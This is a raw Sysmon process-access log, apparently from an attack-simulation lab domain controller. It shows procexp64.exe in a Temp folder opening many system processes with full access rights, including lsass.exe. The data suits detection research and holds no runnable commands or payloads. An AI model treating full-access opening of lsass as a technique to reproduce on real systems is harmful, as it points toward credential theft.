15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792232Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792231Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792230Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792229Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792228Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792227Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792226Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792225Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792224Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:01.844{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792467Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E4A2-00000000A301}6804C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792466Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3269-6010-E3A2-00000000A301}2476C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792465Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3255-6010-D4A2-00000000A301}4024C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792464Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-3235-6010-C4A2-00000000A301}4840C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792463Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A3A2-00000000A301}6416C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792462Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A3-6010-A2A2-00000000A301}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792461Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-31A1-6010-A1A2-00000000A301}6836C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792460Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2A78-6010-96A1-00000000A301}4816C:\Users\Administrator\Downloads\procexp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792459Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DC82-00000000A301}1436C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792458Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2808-600F-DB82-00000000A301}7708C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792457Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-2806-600F-D682-00000000A301}6624C:\Windows\explorer.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792456Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1EBE-600B-A206-00000000A301}7468C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792455Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1E06-00000000A301}2936C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792454Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1DB4-600B-1D06-00000000A301}5472C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792453Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D92-600B-0806-00000000A301}4464C:\Windows\system32\fontdrvhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792452Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0706-00000000A301}7696C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792451Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1D85-600B-0606-00000000A301}4952C:\Program Files\Internet Explorer\iexplore.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792450Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A401-00000000A301}5528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792449Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E2-600B-A101-00000000A301}5376C:\Windows\System32\rdpclip.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792448Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17E0-600B-9701-00000000A301}2256C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792447Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9501-00000000A301}1036C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792446Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-17DF-600B-9401-00000000A301}5084C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792445Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A8-600B-E200-00000000A301}4204C:\Windows\System32\msdtc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792444Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-15A1-600B-DF00-00000000A301}3152C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792443Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-159B-600B-D600-00000000A301}2808C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792442Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-AC00-00000000A301}4656C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792441Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1593-600B-A800-00000000A301}2616C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792440Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 